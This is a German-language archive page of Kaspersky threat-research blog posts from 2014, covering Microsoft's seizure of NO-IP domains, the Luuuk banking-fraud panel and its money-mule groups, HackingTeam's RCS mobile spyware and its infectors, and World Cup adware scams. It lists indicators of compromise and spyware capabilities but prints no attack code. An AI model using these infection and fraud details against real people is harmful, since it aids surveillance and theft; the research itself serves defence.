NO-IP ist einer von vielen Dynamic DNS-Providern da draußen, die kostenlos genutzt werden können, um eine Subdomain auf so populären Domain-Namen wie “servepics.com” oder “servebeer.com” zu registrieren. Für eine recht lange Zeit war das die Lieblingsmethode von Cyberkriminellen, die leicht zu aktualisierende Hostnamen registrieren wollten, um ihre Malware-Implantate zu kontrollieren. Gestern ging Microsoft gegen NO-IP vor und beschlagnahmte 22 seiner Domains. Das Unternehmen strengte zudem einen Zivilprozess an gegen “Mohamed Benabdellah und Naser Al Mutairi sowie ein U.S.-Unternehmen, Vitalwerks Internet Solutions, LLC (die dieselben Geschäfte betreiben wie No-IP.com), für ihre Rollen, die sie bei der Entwicklung und Kontrolle von Schadprogrammen spielen, sowie für ihre Unterstützung bei der Infektion von Millionen von Computern mit Malware, wodurch Microsoft, seine Kunden und die Öffentlichkeit insgesamt geschädigt werden.”

Interessanterweise führte Microsoft zwei spezielle Malwarefamilien an, die benutzt wurden, „um unschuldige Opfer mit den Schadfamilien Bladabindi (NJrat) und Jenxcus (NJw0rm) zu infizieren”. Diese wurden von zahlreichen Cyberkriminellen und Aktivistengruppen benutzt, um Anwender anzugreifen, unter anderem auch von der berühmt-berüchtigten Syrian Electronic Army. (Bleiben Sie dran – ein ausführlicher Blog hierzu folgt demnächst!).

Hinzu kommt, dass die Beschlagnahme viele andere ATP-Operationen außer Gefecht gesetzt hat, die NO-IP für ihre C&C-Infrastruktur genutzt haben. Darunter auch die folgenden:

Unserer Statistik zufolge hat die Beschlagnahme mindestens 25% aller ATP-Gruppen, die wir beobachten, in irgendeiner Weise beeinträchtigt. Einige dieser Hosts, die früher in umfangreichen und raffinierten Cyberspionage-Operationen verwendet wurden, verweisen nun auf ein Microsoft-Sinkhole bei 204.95.99.59.



Zu den Top Level Domains, die von Vitalwerks konfisziert wurden, gehören unter anderem:


  • BOUNCEME.NET
  • MYFTP.BIZ
  • MYVNC.COM
  • NO-IP.BIZ
  • NO-IP.INFO
  • REDIRECTME.NET
  • SERVEBEER.COM
  • SERVEBLOG.NET
  • SERVECOUNTERSTRIKE.COM
  • SERVEGAME.COM
  • SERVEHALFLIFE.COM
  • SERVEHTTP.COM
  • SERVEMP3.COM
  • SERVEPICS.COM
  • SERVEQUAKE.COM
  • SYTES.NET


Unterdessen haben NO-IP / Vitalwerks ihre Reaktion online veröffentlicht:

“Offensichtlich ist die Microsoft-Infrastruktur nicht in der Lage, die Milliarden von Anfragen unserer Kunden zu verarbeiten. Millionen unschuldiger User mussten Ausfälle hinnehmen, weil Microsoft versucht hat, Hostnamen zu beseitigen, die mit einigen wenigen übelmeinenden Akteuren in Verbindung gebracht werden.”

Wir sind der Meinung, dass die gestrigen Ereignisse vielen Cyberkriminellen und APT-Operationen auf der ganzen Welt einen schweren Schlag versetzt haben.

Es ist anzunehmen, dass diese Gruppen künftig in Bezug auf die Nutzung von Dynamic DNS Providern zurückhaltender sein werden und sich dafür häufiger auf gehackte Websites und direkte IP-Adressen verlegen werden, um ihre C&C-Infrastruktur zu verwalten.

Follow me on Twitter

Nutze die Macht, Luuuk!


  Global Research and Analysis Team of Kaspersky Lab       25 Juni 2014 | 10:00  MSK

Ihr Kommentar  

Der Raub einer halben Million Euro innerhalb nur einer einzigen Woche klingt wie Stoff, aus dem normalerweise Hollywood-Filme gemacht werden. Doch die Organisatoren des Luuuk-Bankenbetrugs haben das nur mit einer Man-in-the-Browser (MITB)-Kampagne gegen eine bestimmte europäische Bank zuwege gebracht. Das gestohlene Geld wurde dann automatisch auf vorher eingerichtete Stroh-Konten überwiesen. Als GReAT das Kontrollpaneel von Luuuk entdeckte, nahm das Team sofort Kontakt mit der betroffenen Bank auf und leitete die Ermittlungen ein.

Am 20. Januar 2014 entdeckte Kaspersky Lab einen verdächtigen Server, der verschiedene Logdateien enthielt, unter anderem Ereignisse von Bots, die an ein C&C-Webpaneel berichteten. Die übermittelten Informationen schienen mit einem Finanzbetrug zusammenzuhängen und sie enthielten Details zu den Opfern und den erbeuteten Geldsummen.




Abb. 1: Beispiel einer Log-Datei


Nach einer tiefer gehenden Analyse fanden wir weitere Dateien auf dem Server, die Protokolle mit unterschiedlichem Content enthielten und potentiell betrügerische Bank-Transaktionen zeigten, sowie Quellcode in JavaScript, der mit der C2-Infrastruktur in Verbindung stand. Diese Informationen lieferten wertvolle Daten über die angegriffene Bank und andere Details, wie etwa das Geldkurier-System und weitere operative Einzelheiten über dieses Betrugschema.




Abb. 2: Quellcode Kontrollpaneel


Nachdem wir alle verfügbaren Daten analysiert hatten, war klar, dass das C2 der serverseitige Teil einer Bank-Trojaner-Infrastruktur war. Wir glauben, dass der Betrug mit Hilfe von Man-in-the-Browser-Techniken begangen wurde und dass es auch möglich war, automatisch Transaktionen durchzuführen, um die Stroh-Konten vorzukonfigurieren.

Wir haben dieses C2 nach dem Pfad, den das Administrationspaneel in dem Server verwendet, luuuk genannt: /server/adm/luuuk/

Es folgt eine Zusammenfassung der wichtigsten Informationen, die wir von der serverseitigen Komponente extrahieren konnten:


  • Etwa 190 Opfer, die meisten aus Italien und der Türkei.
  • Betrügerische Transaktionen mit einem Umfang von über 500.000 € (den Logs zufolge).
  • Falsche Transferbeschreibungen.
  • IBANs der Opfer und der Geldesel.


Das Kontrollpaneel wurde in der Domain uvvya-jqwph.eu gehostet, die während der Analyse zu der IP-Adresse 109.169.23.134 aufgelöst werden konnte.

Der Betrug richtete sich gegen die Kunden einer einzigen Bank. Obgleich wir nicht in der Lage waren, an den Schadcode zu gelangen, der gegen die Opfer eingesetzt wurde, sind wir überzeugt davon, dass die Kriminellen einen Bank-Trojaner verwendeten, der Man-in-the-Browser-Operationen durchführte, um über eine schädliche Webeinschleusung an die Anmeldedaten ihrer Opfer zu gelangen. Den Informationen aus einigen Logdateien zufolge stahl die Malware in Echtzeit Benutzernamen, Passwörter und Einmalkennwörter.




Abb. 3: Beispiel für das Log einer betrügerischen Transaktion.


Einschleusungen dieser Art sind für alle Variationen von Zeus (Citadel, SpyEye, IceIX, etc.) absolut typisch und sie alle sind in Italien wohlbekannt. Während unserer Ermittlungen war es nicht möglich, den Infektionsvektor auszumachen, doch Bank-Trojaner nutzen ein breites Spektrum an Methoden, um ihre Opfer zu infizieren, Spam und Drive-by-Downloads eingeschlossen.


Die Angreifer verwendeten die gestohlenen Anmeldedaten, um den Kontostand der Opfer zu überprüfen und automatisch verschiedene bösartige Transaktionen durchzuführen, vermutlich indem sie im Hintergrund einer legitimen Bank-Session operierten. Das würde zu einem der schädlichen Werkzeuge (einem VNC-Server) passen, das an den schädlichen Server gekoppelt war, den die Angreifer verwendeten.

Neben den “üblichen” Techniken, die angewandt werden, um das Geld der Anwender zu stehlen (Umgehung von Nutzer, Passwort und Einmalkennwort) ist das wirklich Interessante an dieser Kampagne die Klassifikation der vordefinierten Geldkuriere, die zum Transfer des gestohlenen Geldes eingesetzt wurden.

Laut Transaktionsprotokollen gab es 4 verschiedene Geldkurier-Gruppen:

  • 13test: Das Limit, das die Kuriere in dieser Gruppe akzeptieren können, liegt zwischen 40.000 und 50.000 Euro, obgleich einige Kuriere andere Limits haben, und zwar zwischen 20.000 und 30.000 €.
  • 14test: Das Limit, das die Geldesel dieser Gruppe akzeptieren können, liegt zwischen 15.000 und 20.000 Euro, obgleich einige Kuriere andere Limits haben, und zwar zwischen 45.000 und 50.000.
  • 14smallings: Das Limit, das die Kuriere dieser Gruppe akzeptieren können, liegt zwischen 2.500 und 3.000 Euro.
  • 16smallings: Das Limit, das die Geldesel dieser Gruppe akzeptieren können, liegt zwischen 1.750 und 2.000 Euro, obgleich einige Kuriere Summen zwischen 2.500 und 3.000 Euro akzeptieren können (wie in der Gruppe 14smallings).


Das könnte ein Hinweis auf eine gut organisierte Kurier-Infrastruktur sein. Unterschiedliche Gruppen haben unterschiedliche Limits bezüglich der Summen, die auf die Konten ihrer Geldesel überwiesen werden können – ein Indikator für den Grad des Vertrauens untereinander.

Die Betreiber dieses Kontrollpaneels haben alle sensitiven Daten am 22. Januar entfernt - zwei Tage nach Beginn unserer Untersuchungen. Ausgehend von der Transaktionsaktivität glauben wir, dass es sich hierbei eher um einen Umbau der Infrastruktur als um einen generellen Abbruch der Operation handelt.

Unter Berücksichtigung der betrügerischen Transaktionsaktivität, die wir auf dem Server entdeckt haben, und aufgrund mehrerer anderer Indikatoren glauben wir außerdem, dass die Kriminellen, die hinter dieser Operation stecken, sehr aktiv sind. Sie haben überdies proaktive operative Sicherheitsaktivität an den Tag gelegt, wobei sie ihre Taktik ändern und ihre Spuren verwischen, sobald sie entdeckt wurden.

Kaspersky Lab steht in Kontakt mit verschiedenen Strafverfolgungsbehörden und dem betroffenen Finanzinstitut, um die Kriminellen zur Verantwortung zu ziehen.


Kaspersky Fraud Prevention vs. the Luuuk

Die von den KL-Experten gefundenen Indizien weisen darauf hin, dass die Kampagne höchstwahrscheinlich von professionellen Kriminellen organisiert wurde. Allerdings können die bösartigen Tools, die eingesetzt werden, um den Anwendern ihr Geld zu stehlen, mit Hilfe moderner Sicherheitstechnologien effektiv unschädlich gemacht werden. Kaspersky Lab hat die Technologie Kaspersky Fraud Prevention entwickelt – eine mehrstufige Plattform zur Abwehr von finanziellem Online-Betrug. Diese Plattform beinhaltet Koponenten zum Schutz der Kundengeräte vor vielen Angriffstypen, unter anderem “Man-in–the-Browser”-Attacken, sowie Tools, die Unternehmen dabei helfen können, betrügerische Transaktionen zu erkennen und zu blockieren.

HackingTeam 2.0: Jetzt wird’s mobil


  Global Research and Analysis Team of Kaspersky Lab       24 Juni 2014 | 16:00  MSK

Ihr Kommentar  

Mehr als ein Jahr ist vergangenen seit der Veröffentlichung unseres letzten Artikels über das HackingTeam, das italienische Unternehmen, welches ein “legales” Spyware-Tool entwickelt, das als Remote Control System - oder kurz RCS - bekannt ist. In der Zwischenzeit ist viel passiert, daher ist es Zeit für ein Update aller aktuellen Forschungsergebnisse zu der RCS-Malware.

Lokalisierung der Kontrollserver


Eins der wichtigsten Dinge, die wir im Zuge unserer lang andauernden und umfangreichen Ermittlungen aufgedeckt haben, ist ein spezielles Feature, das als Fingerabdruck für die RCS-Kontrollserver (C2s) benutzt werden kann. Wir haben Einzelheiten dieser Methode auf der Virus Bulletin Konferenz 2013 präsentiert.

Um es kurz zu machen: Wenn eine spezielle Anfrage an einen „harmlosen“ HackingTeam RCS-C&C-Server geschickt wird, antwortet der RCS-C&C mit der folgenden Fehlermeldung:






Eine Folie aus unserer VB-Präsentation mit dem Fingerabdruck des C2 von HackingTeam

Zunächst einmal ist der Codename ‘RCS’ hier enthalten - so weit, so gut. Nicht ganz sicher waren wir uns in Bezug auf den ‘Collector,’ auf den in der Antwort hingewiesen wurde. Das bezieht sich wahrscheinlich auf die Tatsache, dass der Server Informationen von den Opfern sammelt, auf Englisch „to collect”. Wir haben diese spezielle Fingerabdruck-Methode verwendet, um den gesamten IPv4-Raum zu scannen, wodurch wir alle IP-Adressen der RCS-C2s rund um den Globus ausfindig machen und sie hübsch auf einer Karte einzeichnen konnten. Wir konnten insgesamt 326 C2s lokalisieren.

Anzahl der C2s Land
64VEREINIGTE STAATEN
49KASACHSTAN
35ECUADOR
32VEREINIGTES KÖNIGREICH
24KANADA
15CHINA
12KOLUMBIEN
7POLEN
7NEUSEELAND
6PERU
6INDONESIEN
6BRASILIEN
6BOLIVIEN
6ARGENTINIEN
5RUSSISCHE FÖDERATION
5INDIEN
4HONG KONG
4AUSTRALIEN
3SPANIEN
2SAUDI ARABIEN
2 MALAYSIA
2ITALIEN
2DEUTSCHLAND
2FRANKREICH
2ÄGYPTEN
1UKRAINE
1THAILAND
1SCHWEDEN
1SINGAPUR
1RUMÄNIEN
1PARAGUAY
1MAROKKO
1LITAUEN
1KENIA
1JAPAN
1IRLAND
1UNGARN
1DÄNEMARK
1TSCHECHISCHE REPUBLIK
1ZYPERN
1ANDERE
1BELGIEN
1ASERBAIDSCHAN






Karte mit den aktuellen Standorten der Server vom HackingTeam


Die meisten identifizierten Server befanden sich in den USA, in Kasachstan und in Ecuador. Leider können wir nicht sicher sein, dass die Server in einem bestimmten Land nicht von den Strafverfolgungsbehörden dieses Landes benutzt werden; in jedem Fall wäre es sinnvoll aus Sicht der Strafverfolgungsbehörden, ihre C&Cs in den eigenen Ländern zu platzieren, um so grenzübergreifende rechtliche Probleme und die Beschlagnahmung von Servern zu vermeiden. Einige IPs wurden jedenfalls eindeutig mit den Regierungen des jeweiligen Landes in Verbindung gebracht, und zwar aufgrund ihrer WHOIS-Informationen, die gute Hinweise darauf liefern, wer sie besitzt.

Mobile Module


Für eine gewisse Zeit war es ein offenes Geheimnis, dass die Produkte von HackingTeam Schadprogramme für Mobiltelefone enthalten. Trotzdem waren sie selten anzutreffen. Insbesondere die Trojaner für Android und iOS konnten zuvor nicht identifiziert werden und gehörten zu einem der letzten weißen Flecken in dieser Geschichte. Früher im laufenden Jahr entdeckten wir einige mobile Malware-Module von HackingTeam für die folgenden Plattformen:



  • Android

  • iOS

  • Windows Mobile

  • BlackBerry

Alle diese Module werden von demselben Konfigurationstyp kontrolliert, was stark darauf hinweist, dass sie miteinander in Zusammenhang stehen und zur selben Produktfamilie gehören.







Konfigurationsdatei von den mobilen RCS-Modulen

Unser Hauptaugenmerk lag bei der Analyse der mobilen Module aufgrund ihrer Popularität sicherlich auf iOS und Android. Das iOS-Modul funktioniert nur auf Geräten mit Jailbreak. Hier eine Beschreibung der wichtigsten Funktionen des iOS-Moduls:



  • Kontrolle von Wi-Fi, GPS, GPRS

  • Sprachaufnahme

  • E-Mail, SMS, MMS

  • Dateiauflistung

  • Cookies

  • Besuchte URLs

  • Webseiten im Cache

  • Adressbuch

  • Anruflisten

  • Notizen

  • Kalender

  • Zwischenablage

  • Liste der Apps

  • Änderung der SIM

  • Live-Mikrophon

  • Kamerabilder

  • Unterstützung von Chats, WhatsApp, Skype, Viber

  • Protokollierung der Tastatureingaben von allen Apps und Screens via libinjection






Disassemblierter Code des iOS-Moduls

Das Android-Modul wird von dem DexGuard-Optimizer/Obfuskator geschützt und ist daher extrem schwierig zu analysieren. Trotzdem haben wir herausgefunden (siehe die Spur unten), dass das Sample über alle oben aufgeführten Funktionen des iOS-Moduls verfügt – plus Unterstützung des Informationsdiebstahls von den folgenden Anwendungen:



  • com.tencent.mm

  • com.google.android.gm

  • android.calendar

  • com.facebook

  • jp.naver.line.android

  • com.google.android.talk






Spur eines RCS-Android-Samples

Mobile Infektoren


Ein anderer Aspekt von besonderem Interesse für uns ist die Art, wie die Malware-Samples auf den mobilen Geräten installiert sind. Wir entdeckten verschiedene Module, die mobile Geräte infizieren, die mit infizierten Windows- oder Mac OS X-Computern verbunden sind.

Wie bereits erwähnt, kann das iOS-Modul nur auf Geräten mit Jailbreak verwendet werden. Daher verwendet der iOS-Infektor das AFP2-Protokoll für die Übertragung. Der “Infektor” hat eine hübsche grafische Benutzeroberfläche, die die Installation ermöglicht, wenn physischer Zugriff auf das Gerät des Opfers besteht oder entfernter Admin-Zugriff auf einen infizierten Computer.





Hauptfenster des iOS-Infektors


iPhone1,1 iPhone1,2 iPhone2,1
iPhone3,1 iPhone3,2 iPhone3,3
iPhone4,1 iPhone5,1 iPhone5,2
iPad1,1 iPad2,1 iPad2,2
iPad2,3 iPad2,4 iPad3,1
iPad3,2 iPad3,3 iPad3,4
iPad3,5 iPad3,6 iPhone
iPhone 3G iPhone 3GS iPhone 4
iPhone 4 iPhone 4 (cdma) iPhone 4s
iPhone 5 (gsm) iPhone 5 iPad
iPad2 (Wi-Fi) iPad2 (gsm) iPad2 (cdma)
iPad2 (Wi-Fi) iPad3 (Wi-Fi) iPad3 (gsm)
iPad3 iPad4 (Wi-Fi) iPad4 (gsm)
iPad4    

Liste der Apple-Geräte, die von dem iOS-Infektor unterstützt werden

Nach der erfolgreichen Verbindungsherstellung kopiert der iOS-Infektor verschiedene Dateien in iOS und führt eine install.sh-Datei aus:







Teil der install.sh-Datei, die auf einem infizierten iOS-Gerät ausgeführt wird

Wie bereits oben erwähnt, ist entfernter Admin-Zugriff auf einen infizierten Computer ein möglicher Weg für die Malware, sich auf einem damit verbundenen mobilen Gerät zu infizieren. Die Tatsache, dass nur iOS-Geräte, auf denen ein Jailbreak durchgeführt wurde, unterstützt werden, kann eine gewisse Einschränkung bedeuten. Doch das ist kein großes Problem, da die Angreifer auch ein Jailbreak-Tool, wie etwa Evasi0n, über denselben infizierten Computer ausführen können. In diesem Fall kann nur noch der Passcode des mobilen Gerätes den User vor einem entfernten Jailbreak und einer Infektion schützen. Doch ist das Gerät entsperrt, während es mit dem infizierten Computer verbunden ist, kann es von Angreifern infiziert werden.

Ein weiterer interessanter Infektor ist der für BlackBerry-Geräte, der die Anwendung JavaLoader verwendet, um Malware-Samples auf BB 4.5 und 5.0 zu laden. In seinem disassemblierten Code fanden wir einen Pfad zu der PDB-Debug-Datei, die vermutlich aus Versehen von den Autoren hinterlassen wurde. Das Originalprojekt befand sich unter ‘C:\HT\RCSBlackBerry\Workspace\RCS_BB_Infection_Agent\’, als diese Malware entwickelt wurde.






Teil des Codes eines Blackberry-Infektors mit Pfad zu der PDB-Datei

Zusammenfassung


In der neusten Folge unserer noch andauernden Untersuchungsreihe entdeckten wir eine umfangreiche Infrastruktur, die zur Kontrolle der RCS-Malware-Implantate dient. Unsere jüngsten Ermittlungen förderten mobile Module zutage, die auf allen wohl bekannten mobilen Plattformen laufen, Android und iOS eingeschlossen. Diese Module werden mit Hilfe von Infektoren installiert – spezielle ausführbare Dateien entweder für Windows oder Macs, die auf bereits infizierten Computern laufen. Sie übernehmen die vollständige Kontrolle über den Computer des Opfers und über alles, was in der Nähe ist. Durch das geheime Aktivieren des Mikrophons und das regelmäßige Erstellen von Kameraaufnahmen wird eine konstante Überwachung des Ziels gewährleistet – was sehr viel effektiver ist als die traditionellen Nacht- und Nebelaktionen.

Die neuen Daten, die wir über das RCS von HackingTeam veröffentlichen, sind extrem wichtig, da sie den Grad der Perfektion und die Ausgereiftheit dieser Überwachungswerkzeuge zeigen. Sind wir in der Lage, unsere Kunden vor solchen raffinierten Bedrohungen zu schützten, so haben wir – unserer Meinung nach – ganz sicher keine Probleme mit weniger komplexen, gewöhnlicheren Bedrohungen, wie sie von Cyberkriminellen benutzt werden.

Anhang:


MD5s der mobilen Infektoren:



  • 14b03ada92dd81d6ce57f43889810087 – BlackBerry infector

  • 35c4f9f242aae60edbd1fe150bc952d5 – iOS infector

MD5s des Android-Samples:



  • ff8e7f09232198d6529d9194c86c0791

  • 36ab980a954b02a26d3af4378f6c04b4

  • a2a659d66e83ffe66b6d728a52130b72

  • 9f06db99d2e5b27b01113f78b745ff28

  • a43ea939e883cc33fc766dd0bcac9f6a

  • a465ead1fd61afe72238306c7ed048fe

MD5s der Windows-Samples:



  • bf8aba6f7640f470a8f75e9adc5b940d

  • b04ab81b9b796042c46966705cd2d201

  • 1be71818a228e88918dac0a8140dbd34

  • c7268b341fd68cf334fc92269f07503a

Liste der aktiven C2s am 19.06.2014:



  • 50.63.180.***

  • 146.185.30.***

  • 204.188.221.***

  • 91.109.17.***

  • 106.186.17.***

  • 119.59.123.***

  • 95.141.46.***

  • 192.71.245.***

  • 106.187.99.***

  • 93.95.219.***

  • 106.187.96.***

  • 124.217.245.***

  • 23.92.30.***

  • 82.146.58.***

  • 93.95.219.***

  • 209.59.205.***


RCS-Module (Bezeichnungen gemäß Klassifizierung von Kaspersky Lab):



  • Backdoor.OSX.Morcut

  • Rootkit.OSX.Morcut

  • Trojan.OSX.Morcut

  • Backdoor.Win32.Korablin

  • Backdoor.Win64.Korablin

  • Rootkit.Win32.Korablin

  • Rootkit.Win64.Korablin

  • Trojan.Multi.Korablin

  • Trojan-Dropper.Win32.Korablin

  • Backdoor.AndroidOS.Criag

  • Trojan-Spy.AndroidOS.Mekir

  • Trojan.Win32.BBInfector

  • Trojan.Win32.IOSinfector

  • Trojan.OSX.IOSinfector

  • Trojan-Spy.IphoneOS.Mekir

  • Trojan-Spy.WinCE.Mekir

  • Trojan-Spy.BlackberryOS.Mekir


Adware oder: Das Geld ist weg und mein persönliches WM-Spitzenspiel kann ich nun doch nicht sehen


  Bestuzhev       19 Juni 2014 | 15:00  MSK

Ihr Kommentar  

Das ist der vierte und letzte Teil unserer Blogpost-Reihe über die Fußball-Weltmeisterschaft 2014 und die damit verbundenen Bedrohungen für die Informationssicherheit. Es geht hier vor allem um Probleme, mit denen wir gerade jetzt zu kämpfen haben, während unsere Fußballstars in Brasilien zeigen, was sie drauf haben.

Viele Fans finden sich selbst nicht vorm Fernseher wieder, sondern suchen vielmehr am Computer nach einem Livestream eines großen Spiels. Doch die Suche nach einer Internetübertragung könnte Geld kosten und außerdem Schadprogramme auf dem Rechner hinterlassen.

Wer im Internet nach einer Liveübertragung der WM sucht, stößt mit ziemlicher Sicherheit auf angekaufte Anzeigen, die auf betrügerischen oder bösartigen Content führen. Hier sind zwei aktuelle Beispiele dafür, beide eigens für die WM eingerichtet:


Besucht man diese Website, so wird man aufgefordert, ein spezielles Plug-In herunterzuladen, das für alle Browser verfügbar ist. Angeblich handelt es sich dabei um den Player, der zum Abspielen der Online-Übertragung der Spiele benötigt wird:


Tatsächlich aber handelt es sich dabei um ein Adware-Programm, das rein gar nichts abspielt, sondern vielmehr die Ressourcen des Computers aufzehrt. Adware ist eine Software, die auf dem schmalen Grat zwischen klassischer Cybercrime-Software und legitimen Programmen wandelt. Daher zeigt unsere Statistik eine konstante Zunahme von Detektionen dieser Programme auf den Geräten der User an:



Sites wie diese versprechen ebenfalls, alles rund um die Fußball-WM zu zeigen:



Die Websites bieten alle Spiele zu jeder Zeit an. Sie versprechen qualitativ hochwertiges Bildmaterial, aufgenommen von den besten Kameras in den Arenen. Selbstverständlich werden alle Kreditkarten akzeptiert!

Doch wie auch immer – wenn Sie bezahlen, sind Sie Ihr Geld los. Zweifelhafte und unehrliche Websites wie diese spielen nicht nach den Regeln.

Ein letzter wichtiger Punkt: Tag für Tag beobachten wir neu registrierte Domainnamen, die Wörter enthalten wie “Fifa Live World Cup steaming 2014”. Wir sind der Überzeugung, dass die meisten davon zu schädlichen Zwecken verwendet werden.

Cyberkriminelle, Opportunisten und andere übelmeinende Individuen halten Ausschau nach Gelegenheiten, wie die Weltmeisterschaft sie ihnen bietet. Sie wissen, dass es zu solchen Zeiten am einfachsten ist, Leute zu betrügen, ihnen Geld zu stehlen und ihre Geräte mit Malware zu infizieren. Lassen Sie sich nicht über den Tisch ziehen und tappen Sie in keine Social-Engineering-Falle. Nutzen Sie den besten Antimalware-Schutz und behalten Sie einen klaren Kopf, wenn Sie im Internet surfen und nach bestimmtem Content suchen. Und falls Sie eine Liveübertragung sehen wollen, so nutzen Sie doch eine dieser legitimen Ressourcen.

Folgen Sie mir auf twitter: @dimitribest

Nach oben  |  Archiv >>

 

Copyright © 1996 - 2014
Kaspersky Lab
Industry Leading Antivirus Software
Alle Rechte vorbehalten
 

Email: webmaster@kaspersky.com
Datenschutzbestimmungen